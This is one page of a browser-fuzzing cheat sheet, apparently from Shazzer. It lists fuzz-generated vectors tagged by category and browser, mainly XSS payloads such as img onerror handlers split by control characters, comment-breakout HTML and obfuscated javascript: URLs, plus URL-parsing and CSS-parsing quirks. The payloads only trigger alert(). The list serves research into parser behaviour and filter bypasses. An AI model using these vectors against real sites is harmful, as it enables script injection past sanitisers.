Shazzer logo

Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 169 vectors with results

anchor.href='/0x09/example.com';0x0D
if(anchor.host === 'example.com')alert(9)
JSURL HandlingChrome
anchor.href='///example.com';0x0D
if(anchor.host === 'example.com')alert(47)
JSURL HandlingChrome
anchor.href='/\/example.com';0x0D
if(anchor.host === 'example.com')alert(92)
JSURL HandlingChrome
anchor.href='/0x00/example.com';0x0D
if(anchor.host === 'example.com')alert(0)
JSURL HandlingChrome
<img src 0x09onerror=alert(9)>
XSSHTML ParsingChrome
<img src 
onerror=alert(10)>
XSSHTML ParsingChrome
<img src 0x0Conerror=alert(12)>
XSSHTML ParsingChrome
<img src 0x0Donerror=alert(13)>
XSSHTML ParsingChrome
<img src  onerror=alert(32)>
XSSHTML ParsingChrome
133709in0x09alert(9)
JSXSS ExecutionChromeSafariFirefox
1337
in
alert(10)
JSXSS ExecutionChromeSafariFirefox
13370x0Bin0x0Balert(11)
JSXSS ExecutionChromeSafariFirefox
13370x0Cin0x0Calert(12)
JSXSS ExecutionChromeSafariFirefox
13370x0Din0x0Dalert(13)
JSXSS ExecutionChromeSafariFirefox
<img0x09src0x09onerror=alert(9)>
XSSDOM BehaviorChromeFirefoxSafari
<img
src
onerror=alert(10)>
XSSDOM BehaviorChromeFirefoxSafari
<img0x0Csrc0x0Conerror=alert(12)>
XSSDOM BehaviorChromeFirefoxSafari
<img0x0Dsrc0x0Donerror=alert(13)>
XSSDOM BehaviorChromeFirefoxSafari
<img src onerror=alert(32)>
XSSDOM BehaviorChromeFirefoxSafari
document09['location'];alert(9)
JSXSS ExecutionChromeFirefoxSafari
document
['location'];alert(10)
JSXSS ExecutionChromeFirefoxSafari
document0x0B['location'];alert(11)
JSXSS ExecutionChromeFirefoxSafari
document0x0C['location'];alert(12)
JSXSS ExecutionChromeFirefoxSafari
document0x0D['location'];alert(13)
JSXSS ExecutionChromeFirefoxSafari
<a href="https://0x09example.com/" id="test9"></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://
example.com/" id="test10"></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://0x0Dexample.com/" id="test13"></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https:///example.com/" id="test47"></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://@example.com/" id="test64"></a>
XSSURL HandlingChromeFirefoxSafari
if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}
JSURL HandlingChromeSafariFirefox
if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}
JSURL HandlingChromeSafariFirefox
const c = String.fromCodePoint(i)0x0D
const c_upper = c.toUpperCase()0x0D
if (c_upper.length > c.length && isASCII(c_upper)){0x0D
    alert(c)0x0D
}
JSJavaScript SyntaxChrome
<div style="/**/color:red;">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'blah';color:red"></div>
HTMLCSS ParsingChromeFirefoxSafari
var $=alert(36)
JSJavaScript SyntaxChromeFirefoxSafari
var _=alert(95)
JSJavaScript SyntaxChromeFirefoxSafari
var ª=alert(170)
JSJavaScript SyntaxChromeFirefoxSafari
var µ=alert(181)
JSJavaScript SyntaxChromeFirefoxSafari
<a href="//test.com/" id="test47"></a>
XSSURL HandlingChromeFirefoxSafari
<a href="/\test.com/" id="test92"></a>
XSSURL HandlingChromeFirefoxSafari
<a href="/0x00test.com/" id="test0"></a>
XSSURL HandlingChromeFirefoxSafari
window09.alert();alert(9)
JSXSS ExecutionChromeFirefoxSafari
window
.alert();alert(10)
JSXSS ExecutionChromeFirefoxSafari
window0x0B.alert();alert(11)
JSXSS ExecutionChromeFirefoxSafari
window0x0C.alert();alert(12)
JSXSS ExecutionChromeFirefoxSafari
window0x0D.alert();alert(13)
JSXSS ExecutionChromeFirefoxSafari
const c = String.fromCodePoint(i);0x0D
0x0D
if (c.length !== c.toUpperCase().length) alert(i)
JSJavaScript SyntaxChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(9) + "m").hostname === 'example.com'){alert(9)}
JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(10) + "m").hostname === 'example.com'){alert(10)}
JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(13) + "m").hostname === 'example.com'){alert(13)}
JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(173) + "m").hostname === 'example.com'){alert(173)}
JSURL HandlingChromeFirefoxSafari
if (new URL("https://example.co" + String.fromCodePoint(847) + "m").hostname === 'example.com'){alert(847)}
JSURL HandlingChromeFirefoxSafari
<div class="0x09x0x09"></div>
XSSHTML ParsingChromeFirefoxSafari
<div class="
x
"></div>
XSSHTML ParsingChromeFirefoxSafari
<div class="0x0Cx0x0C"></div>
XSSHTML ParsingChromeFirefoxSafari
<div class="0x0Dx0x0D"></div>
XSSHTML ParsingChromeFirefoxSafari
<div class=" x "></div>
XSSHTML ParsingChromeFirefoxSafari
<!--- ><xmp>--><img src/onerror=alert(45)>-->
XSSHTML ParsingChromeFirefoxSafari
<div style="font-family:'x
;color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0C;color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0D;color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x';color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
    alert(i)0x0D
}
JSJavaScript SyntaxChrome
<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>
XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j
avas
crip
t:window">craft-me</a>
XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>
XSSURL HandlingChromeFirefoxSafari

Page 8 of 9